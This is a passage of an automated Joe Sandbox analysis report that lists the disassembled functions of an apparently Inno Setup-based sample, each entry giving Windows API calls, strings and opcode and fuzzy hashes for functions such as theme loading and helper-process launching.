                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 873889042-0
                                                                                                                                                                      • Opcode ID: 8845cea528808f054f1dedd4051fe76d948a17bccb509627c194ed8251fff6d6
                                                                                                                                                                      • Instruction ID: 4713bb530a1d6cf0c1be7e5c5fdd45c253cc675fccbb574d3c3c9d841926f9e3
                                                                                                                                                                      • Opcode Fuzzy Hash: 8845cea528808f054f1dedd4051fe76d948a17bccb509627c194ed8251fff6d6
                                                                                                                                                                      • Instruction Fuzzy Hash: 44F0F971A04704AB8B21DFA69D4149EB7ACEB86725B5046BBFC14E3282DAB84E054558
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00417590 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CaptureIconic
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2277910766-0
                                                                                                                                                                      • Opcode ID: d3578eab4591e842fd700368e217f6695640d240fe6429a4dd0cb93449941a9c
                                                                                                                                                                      • Instruction ID: 3321041a09622c131d5de1c426c5b9ba37bf97161ea704a377034d17a7c99502
                                                                                                                                                                      • Opcode Fuzzy Hash: d3578eab4591e842fd700368e217f6695640d240fe6429a4dd0cb93449941a9c
                                                                                                                                                                      • Instruction Fuzzy Hash: 2EF0AF7230564157D7209B2EC984ABB62F69F88318B54483FE419CBB61EB78DCC08658
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042418C Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsIconic.USER32(?), ref: 00424193
                                                                                                                                                                        • Part of subcall function 00423A7C: EnumWindows.USER32(00423A14), ref: 00423AA0
                                                                                                                                                                        • Part of subcall function 00423A7C: GetWindow.USER32(?,00000003), ref: 00423AB5
                                                                                                                                                                        • Part of subcall function 00423A7C: GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                                                                                                                                        • Part of subcall function 00423A7C: SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                                                                                                                                      • SetActiveWindow.USER32(?,?,?,00423D6B,00000000,00424154), ref: 004241A7
                                                                                                                                                                        • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2671590913-0
                                                                                                                                                                      • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                                                                                                                      • Instruction ID: 714e4cd20337d44954868cb88e5cd3c5f05620b237e6b6751f152470bbecd415
                                                                                                                                                                      • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                                                                                                                      • Instruction Fuzzy Hash: 47E01AA070011087EB10AF69DCC9B9632A8BB4C304F5501BABD49CF25BD63CC8608728
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00455570 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                      • Opcode ID: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                                                                                                                                      • Instruction ID: 76bfcf8d2b29e22e6d76dcded3dafddf5190573ba102c834aba1eed314c6e9aa
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                                                                                                                                      • Instruction Fuzzy Hash: C9D0C27130460467C700AA68DC825AA358E8B84306F00483E3CC5DA2C3FABDDA485756
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0044B650 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0044B5FC: GetVersionExA.KERNEL32(00000094), ref: 0044B619
                                                                                                                                                                      • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C1
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7D3
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7E5
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7F7
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B809
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B81B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B82D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B83F
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B851
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B863
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B875
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B887
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B899
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8AB
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8BD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8CF
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E1
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8F3
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B905
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B917
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B929
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B93B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B94D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B95F
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B971
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B983
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B995
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9A7
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9B9
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9CB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                                                      • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                                                      • API String ID: 1968650500-2910565190
                                                                                                                                                                      • Opcode ID: 1746f22bc9a61a44320000deca3510c101e030ecc3800527cea9977f983cdaf7
                                                                                                                                                                      • Instruction ID: 77cdb2a24b144e98dd8fe0af3c477b00202e10f27d636664339925e4e96e780e
                                                                                                                                                                      • Opcode Fuzzy Hash: 1746f22bc9a61a44320000deca3510c101e030ecc3800527cea9977f983cdaf7
                                                                                                                                                                      • Instruction Fuzzy Hash: 679198F0A40B11EBEB00AFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00491D44 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00000000,00000000,00492239,?,?,?,?,00000000,00000000,00000000), ref: 00491D84
                                                                                                                                                                      • FindWindowA.USER32(00000000,00000000), ref: 00491DB5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FindSleepWindow
                                                                                                                                                                      • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                                                                                      • API String ID: 3078808852-3310373309
                                                                                                                                                                      • Opcode ID: 0180ec8947f9559986f34b7ce41e773425f3aba19d576cb51dfb277666b873ab
                                                                                                                                                                      • Instruction ID: dc8cd37179c6c7efec8ae072485b7dd58185b77a9baa1073e2e80a3326dd0ce5
                                                                                                                                                                      • Opcode Fuzzy Hash: 0180ec8947f9559986f34b7ce41e773425f3aba19d576cb51dfb277666b873ab
                                                                                                                                                                      • Instruction Fuzzy Hash: 6CC19360B043406BDB24BF7E9D4291A59999F98708711897FB846EB38BCE7CDC0E439D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004583E8 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0045844F
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(022E3858,00000000,004586E2,?,?,022E3858,00000000,?,00458DDE,?,022E3858,00000000), ref: 00458458
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(022E3858,022E3858), ref: 00458462
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,022E3858,00000000,004586E2,?,?,022E3858,00000000,?,00458DDE,?,022E3858,00000000), ref: 0045846B
                                                                                                                                                                      • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004584E1
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,022E3858,022E3858), ref: 004584EF
                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458537
                                                                                                                                                                      • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045868D,?,00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458570
                                                                                                                                                                        • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458619
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045864F
                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF,00458694,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458687
                                                                                                                                                                        • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                                                                                      • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                                                                                      • API String ID: 770386003-3271284199
                                                                                                                                                                      • Opcode ID: 2d465d32cbdbe274e3fd52fef7683bce22f1e058abacde4db356a62342c59296
                                                                                                                                                                      • Instruction ID: 5a0611516353431e4aeb24f6ab6c42495b14cb215b8b3d0382893c99e5952ef8
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d465d32cbdbe274e3fd52fef7683bce22f1e058abacde4db356a62342c59296
                                                                                                                                                                      • Instruction Fuzzy Hash: E8711370A003449EDB11DF65CC41B9E7BF8EB19305F1085BAF958FB282DB7899448F69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041CA04 Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • 7406A670.USER32(00000000,?,0041A93C,?), ref: 0041CA38
                                                                                                                                                                      • 74074D40.GDI32(?,00000000,?,0041A93C,?), ref: 0041CA44
                                                                                                                                                                      • 74076280.GDI32(0041A93C,?,00000001,00000001,00000000,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA68
                                                                                                                                                                      • 74074D00.GDI32(?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA78
                                                                                                                                                                      • SelectObject.GDI32(0041CE34,00000000), ref: 0041CA93
                                                                                                                                                                      • FillRect.USER32(0041CE34,?,?), ref: 0041CACE
                                                                                                                                                                      • SetTextColor.GDI32(0041CE34,00000000), ref: 0041CAE3
                                                                                                                                                                      • SetBkColor.GDI32(0041CE34,00000000), ref: 0041CAFA
                                                                                                                                                                      • PatBlt.GDI32(0041CE34,00000000,00000000,0041A93C,?,00FF0062), ref: 0041CB10
                                                                                                                                                                      • 74074D40.GDI32(?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C), ref: 0041CB23
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041CB54
                                                                                                                                                                      • 74068900.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C), ref: 0041CB6C
                                                                                                                                                                      • 74062350.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?), ref: 0041CB75
                                                                                                                                                                      • 74068900.GDI32(0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB84
                                                                                                                                                                      • 74062350.GDI32(0041CE34,0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB8D
                                                                                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041CBA6
                                                                                                                                                                      • SetBkColor.GDI32(00000000,00000000), ref: 0041CBBD
                                                                                                                                                                      • 74074E40.GDI32(0041CE34,00000000,00000000,0041A93C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC02,?,?,00000000), ref: 0041CBD9
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041CBE6
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041CBFC
                                                                                                                                                                        • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$74074$ObjectSelect$7406235074068900Text$740674076280A670DeleteFillRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 262335245-0
                                                                                                                                                                      • Opcode ID: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                                                                                                                                      • Instruction ID: 82b5d3b79294c4079cc38f46940f8a3e5246528c32e36f15c424f6ef30e38055
                                                                                                                                                                      • Opcode Fuzzy Hash: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                                                                                                                                      • Instruction Fuzzy Hash: 0061F071A44608AFDB10EBE5DC86FEFB7B8EB48704F10446AB504E7281D67CA9508B69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00450294 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 45libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersion.KERNEL32(00480154), ref: 004502A7
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480154), ref: 004502BF
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RmStartSession), ref: 004502DD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RmRegisterResources), ref: 004502F2
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RmGetList), ref: 00450307
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RmShutdown), ref: 0045031C
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RmRestart), ref: 00450331
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RmEndSession), ref: 00450346
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                                                      • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                                                                                      • API String ID: 1968650500-3419246398
                                                                                                                                                                      • Opcode ID: 931645a553461fbf2b98b1411c7f7c711a615b3d45489185dd4c663eaacfdf9c
                                                                                                                                                                      • Instruction ID: 86b2f7b41730535ff8ff974bf0b660ab9cb9644c053cd973342487371e557a0c
                                                                                                                                                                      • Opcode Fuzzy Hash: 931645a553461fbf2b98b1411c7f7c711a615b3d45489185dd4c663eaacfdf9c
                                                                                                                                                                      • Instruction Fuzzy Hash: EF11B3B5510301EBD610FB65BF46A2E37EAE728715B08063FE904962A2CB7C8844CF9C
